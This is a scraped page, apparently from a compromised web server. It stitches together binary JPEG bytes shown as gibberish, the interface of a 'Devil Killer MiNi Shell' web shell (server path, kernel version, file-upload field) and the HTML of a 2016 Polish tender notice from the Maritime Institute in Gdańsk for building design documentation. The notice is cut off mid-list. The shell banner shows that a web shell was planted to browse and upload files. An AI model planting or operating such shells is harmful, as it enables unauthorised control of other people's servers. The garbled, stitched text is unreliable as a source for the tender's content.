JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160202/22628-N-2016.html

<p class="kh_header"><b>Gdańsk: Opracowanie dokumentacji projektowej dla inwestycji: Budowa budynków biurowo-laboratoryjnego i warsztatowo-magazynowego Instytutu Morskiego w Gdańsku</b><br>
<b>Numer ogłoszenia: 22628 - 2016; data zamieszczenia: 02.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Morski w Gdańsku , ul. Długi Targ 41/42, 80-830 Gdańsk, woj. pomorskie, tel. -58 3011641, 3018385.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.im.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dla inwestycji: Budowa budynków biurowo-laboratoryjnego i warsztatowo-magazynowego Instytutu Morskiego w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej, Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych, kosztorysów, dokumentacji środowiskowej oraz innej niezbędnej do uzyskania decyzji o pozwoleniu na budowę. Ponadto, Wykonawca w ramach tego zamówienia, zobowiązany będzie do pełnienia nadzoru autorskiego dla inwestycji  Budowa budynków biurowo-laboratoryjnego i warsztatowo-magazynowego Instytutu Morskiego w Gdańsku..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do 50% wartości zamówienia podstawowego.  
Zamówienie to, może zostać udzielone np. w zakresie nadzoru autorskiego, wg wysokości stawek dziennych, nie wyższych niż wynikających ze złożonej oferty.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 13.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający na podstawie art. 45 i 46 ustawy, ustala nw. zasady dotyczące wnoszenia  wadium przez Wykonawców. 
Wadium wnosi się przed upływem terminu składania ofert.
Zamawiający określa kwotę wadium w wysokości 10.000,00 zł (słownie: dziesięć tysięcy zł i 00/100 gr.)
Wadium może być wnoszone w jednej lub kilku następujących formach:
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-  gwarancjach bankowych;
-  gwarancjach ubezpieczeniowych;
-  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
   ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju    Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 z późn. zm.) Jeżeli Wykonawca zamierza wnieść wadium w pieniądzu, kwotę wadium należy wpłacić przelewem na poniższe konto Zamawiającego:
Bank  Zachodni WBK S.A. 
PL 57 1090 1098 0000 0001 3091 6151
Swift: WBKPPLPP
tytułem wpłata wadium na usługę projektową  
Zamawiający dokona niezwłocznego zwrotu wadium jeżeli:
-  ogłosił wybór oferty najkorzystniejszej, za wyjątkiem Wykonawcy którego oferta 
   została wybrana jako najkorzystniejsza.
-  unieważnił postępowanie o udzielenie zamówienia.
-  Wykonawca wycofał ofertę przed upływem terminu składania ofert i złożył wniosek             
   o zwrot wadium. 
- została zawarta umowa z Wykonawca którego oferta została wybrana jako najkorzystniejsza.
Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. W tej sytuacji Wykonawca dokona wniesienia wadium w terminie określonym przez Zamawiającego. 
Jeżeli Wykonawca dokona wniesienia wadium w pieniądzu, Zamawiający dokona zwrotu tego wadium wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 
Zamawiający dokona zatrzymania wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, pełnomocnictw,  listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Pzp, lub informacji o tym, że nie należy do grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki, o której mowa a art. 87 ust. 2 pkt 3,co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. Zamawiający dokona zatrzymania wadium wraz z odsetkami, jeżeli Wykonawca którego oferta została wybrana: odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. Wykonawca zobowiązany jest w przypadku wniesienia wadium w pieniądzu, dokonać jego przelewu na wskazany rachunek bankowy Zamawiającego oraz wskazać w pkt 12 zał. nr 1 do SIWZ, nazwę banku i nr konta bankowego, na który Zamawiający dokona zwrotu wadium. Jeżeli oferta Wykonawcy zostanie złożona po wyznaczonym terminie składania ofert i zabezpieczona wadium poprzez przelew na wskazany rachunek bankowy Zamawiającego, Zamawiający dokona niezwłocznego zwrotu takiego wadium. Wadium to zostanie zwrócone przelewem bankowym na rachunek bankowy albo na  nr konta z którego została kwota ta przelana do Zamawiającego. Poręczenia bankowe, lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej,  gwarancje bankowe i ubezpieczeniowe, poręczenia udzielane przez podmioty których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, muszą być złożone w oryginale oraz nieodwołalnie i bezwarunkowo zobowiązywać Poręczyciela lub Gwaranta do zapłaty kwoty pieniężnej na pierwsze wezwanie Zamawiającego w wysokości odpowiadającej kwocie wadium. Jeżeli ww. gwarancje i poręczenia wystawione zostaną w języku obcym, Wykonawca zobowiązany jest dokonać ich tłumaczenia na j. polski. Oryginały gwarancji lub poręczeń, należy złożyć w siedzibie Zamawiającego tj. Instytut Morski w Gdańsku, ul. Długi Targ 41 42, 80-830 Gdańsk - pok. nr 7, przed upływem terminu składania ofert. Wraz z oryginałami gwarancji lub poręczeń, należy pisemnie podać ich adres zwrotny. Kopie tych dokumentów oraz ich tłumaczenia, jeżeli są wstawione w j. obcym, należy potwierdzić za zgodność z oryginałem i dołączyć do oferty. Wadium musi obejmować okres związania z ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga potwierdzenia spełnienia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że zrealizował, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie nw. dokumentacje projektowe (potwierdzone dowodami, że usługi te zostały wykonane należycie) obejmujące swoim zakresem projektowanie:
ba) nowego budynku użyteczności publicznej lub innego nowego budynku o przeznaczeniu administracyjno-biurowym. Wykonawca musi wykazać wykonanie min. jednej usługi projektowej o wartości min. 100.000 zł netto (słownie zł: sto tysięcy). Ww. wykonana usługa musi dotyczyć budynku o powierzchni użytkowej min. 1000 m2 lub kubatury min. 3000  m3. Dopuszcza się wykazanie tego warunku, jeżeli Wykonawca zamiast projektowania nowego budynku, wykonał dokumentację modernizacji lub adaptacji istniejącego budynku użyteczności publicznej lub innego budynku o przeznaczeniu administracyjno-biurowym albo innego budynku dla potrzeb użyteczności publicznej. W tym przypadku należy wykazać się min. jedną usługą projektową modernizacji lub adaptacji, o wartości min. 100.000 zł netto i jednocześnie wykonana usługa modernizacji lub adaptacji musi dotyczyć budynków lub ich części, o powierzchni użytkowej min. 1000 m2 lub kubatury min. 3000  m3. Dopuszcza się łączenie ww. usług (zarówno w ramach nowoprojektowanych jak i modernizowanych i adaptowanych budynków lub ich części) w celu wykazania spełnienia warunku udziału w zakresie usług projektowania, wartości usługi, powierzchni użytkowej lub kubatury, z zastrzeżeniem, że do każdej z tych usług będą załączone dowody potwierdzające ich należyte wykonanie. Dopuszcza się wykazanie wykonania ww. usługi o wartości min. 100.000 zł. netto, wraz z usługą nadzoru autorskiego. Za datę wykonania usług, przyjmuje się datę zakończenia i odbioru dokumentacji projektowej.     

bb) nowego budynku laboratoryjnego. Wykonawca musi wykazać wykonanie  min. jednej usługi projektowej o wartości min. 100.000 zł netto (słownie zł: sto tysięcy). Ww. wykonana usługa musi dotyczyć budynku o powierzchni użytkowej min. 300 m2 lub kubatury min. 800 m3. Dopuszcza się wykazanie tego warunku, jeżeli Wykonawca zamiast projektowania ww. nowych budynków, wykonał dokumentację modernizacji lub adaptacji budynku lub pomieszczeń dla potrzeb laboratoryjnych. W tym przypadku należy wykazać się min. jedną usługą projektową z zakresu modernizacji lub adaptacji, o wartości min. 100.000 zł netto i jednocześnie wykonana usługa modernizacji lub adaptacji musi dotyczyć budynku lub pomieszczeń o powierzchni użytkowej min. 300 m2 lub kubatury min. 800  m3. Dopuszcza się łączenie tych usług (zarówno w ramach nowoprojektowanych jak i modernizowanych i adaptowanych budynków lub pomieszczeń) w celu wykazania spełnienia tego warunku udziału w zakresie  usług projektowania, wartości usługi, powierzchni użytkowej lub kubatury, z zastrzeżeniem, że do każdej z tych usług będą załączone dowody potwierdzające ich należyte wykonanie. Dopuszcza się wykazanie wykonania ww. usługi o wartości min. 100.000 zł. netto, wraz z usługą nadzoru autorskiego. Za datę wykonania usług, przyjmuje się datę zakończenia i odbioru dokumentacji projektowej.     

Wykaz wykonanych usług, musi zawierać adres obiektu którego dotyczyły usługi projektowe, datę zakończenia usług, rodzaj budynku którego dotyczyły usługi, opis wykonywanych usług, wartość wykonanych usług, odbiorców, oraz dowody określające, że usługi te zostały wykonane w sposób należyty. 
Dowodem potwierdzającym należyte wykonanie ww. robót, jest:
- poświadczenie;
- inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. 
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie wykonanych robót (zał. nr 3 do SIWZ), zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania ww. dowodów potwierdzających należyte wykonanie robót. Za datę wykonania usług, przyjmuje się datę zakończenia i odbioru dokumentacji projektowej.     

Jeżeli Wykonawca wykaże wykonanie ww. usług w walutach obcych, Zamawiający dokona ich przeliczenia na polski złoty wg tabeli A kursów średnich walut obcych opublikowanych przez Narodowy Bank Polski, z dnia zakończenia usług projektowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków o których mowa w art. 24 ust. 1 ustawy Pzp, natomiast warunek posiadania wiedzy i doświadczenia mogą spełniać łącznie. 
Jeżeli Wykonawca, wykazując spełnienie warunków posiadania wiedzy i doświadczenia, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. b ustawy prawo zamówień publicznych, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania zamówienia  oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda nw. dokumentów: pisemnego zobowiązania innego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia,	zakresu dostępnych Wykonawcy zasobów innego podmiotu, sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Wykaz wykonanych usług zawiera załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku, Wykonawca zobowiązany jest wykazać, że dysponuje osobami, posiadającymi uprawnienia do projektowania bez ograniczeń, zgodnie z wymogami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity: Dz. U. z 2013 r. poz. 1409, z późniejszymi zmianami), w następujących specjalnościach:architektonicznej, konstrukcyjno - budowlanej, inżynieryjno-drogowej, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych lub odpowiadające im aktualne równoważne uprawnienia, które zostały wydane na podstawie wcześniejszej obowiązujących przepisów prawa dla każdego projektanta, który będzie pełnił samodzielną funkcję związaną z realizacją zamówienia i którzy są członkami Izby Architektów lub Izby Inżynierów Budownictwa - w zależności od specjalności. Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej  (Dz. U. z 2008 r. nr 63, poz. 394).
Ponadto, Wykonawca zobowiązany jest wykazać, że dysponuje Głównym Projektantem tj. osobą  która może pełnić samodzielną funkcję techniczną w budownictwie tzn. posiadającą uprawnienia do projektowania bez ograniczeń w specjalności architektonicznej. W szczególności posiada umiejętności do fachowej oceny zjawisk technicznych lub samodzielnego rozwiązywania zjawisk architektonicznych i technicznych oraz techniczno-organizacyjnych. Do zadań Głównego Projektanta będzie należało: projektowanie, sprawdzenie projektów techniczno-budowlanych oraz sprawowanie nadzoru autorskiego. Wymaga się posiadania przez tą osobę odpowiedniego wykształcenia technicznego oraz odbycia praktyki zawodowej. Osoba ta musi posiadać  uprawnienia budowlane, wydane w formie decyzji przez właściwy organ samorządu budowlanego. Zamawiający dopuszcza do łączenia lub pełnienia ww. funkcji przez jedną osobę.

Zamawiający wymaga podania informacji o podstawie do dysponowania tymi osobami. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków o których mowa w art. 24 ust. 1 ustawy Pzp, natomiast warunek dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia mogą spełniać łącznie.
Jeżeli Wykonawca, wykazując spełnienie warunków dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. b ustawy prawo zamówień publicznych, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda nw. dokumentów:
- pisemnego zobowiązania innego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia,
- zakresu dostępnych Wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
- charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Wykaz osób odpowiedzialnych za usługi projektowe, zawiera załącznik nr  4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku, Wykonawca zobowiązany jest wykazać się że posiada aktualną i opłaconą polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Suma ubezpieczenia na polisie lub ww. dokumencie nie może być mniejsza niż 300.000 zł. (słownie: trzysta tysięcy zł i 00/100 gr.). Wraz z kopią polisy lub ww. dokumentem  potwierdzonym przez Wykonawcę za zgodność z oryginałem, należy przedstawić dokument potwierdzający jej opłatę lub oświadczenie właściwego zakładu ubezpieczeń, że Wykonawca nie zalega z bieżącym uiszczaniem składek. Jeżeli Wykonawca przedmiotową polisę opłaca w ratach, należy przedstawić wszystkie dokumenty potwierdzające opłatę składek lub zaświadczenie właściwego zakładu ubezpieczeń, że Wykonawca nie zalega z bieżącym uiszczaniem składek. Zaświadczenie z właściwego zakładu ubezpieczeń nie może być wystawione wcześniej niż 3 miesiące przed upływem terminu składania ofert. Dokumenty potwierdzające opłatę składek i zaświadczenie z właściwego zakładu ubezpieczeń, można przedstawić w kopii potwierdzonej za zgodność z oryginałem. W przypadku gdy suma ubezpieczenia na polisie lub innym dokumencie potwierdzającym że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej wyrażona będzie w walucie obcej, Zamawiający dokona jej przeliczenia na polski złoty wg tabeli A kursów średnich walut obcych opublikowanych przez Narodowy Bank Polski, z dnia wystawienia polisy lub dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej. W sytuacji braku daty wystawienia polisy lub ww. dokumentu, Zamawiający dokona przeliczenia na polski złoty z pierwszego dnia obowiązywania polisy lub dokumentu. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków o których mowa w art. 24 ust. 1 ustawy Pzp, natomiast warunek znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia mogą spełniać łącznie. 
  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 oraz 2a ustawy Pzp. 
Zamawiający, zgodnie z art. 24 ust. 2a ustawy Pzp, wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonywana  w  oparciu o prawidłowość i kompletność złożonych wszystkich oświadczeń i dokumentów, jakich zażądał Zamawiający, zgodnie z warunkami określonymi w niniejszej specyfikacji. Zamawiający  dokonywać będzie oceny spełniania wymaganych warunków wg formuły spełnia albo nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że zrealizował, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie nw. dokumentacje projektowe (potwierdzone dowodami, że usługi te zostały wykonane należycie) obejmujące swoim zakresem projektowanie:
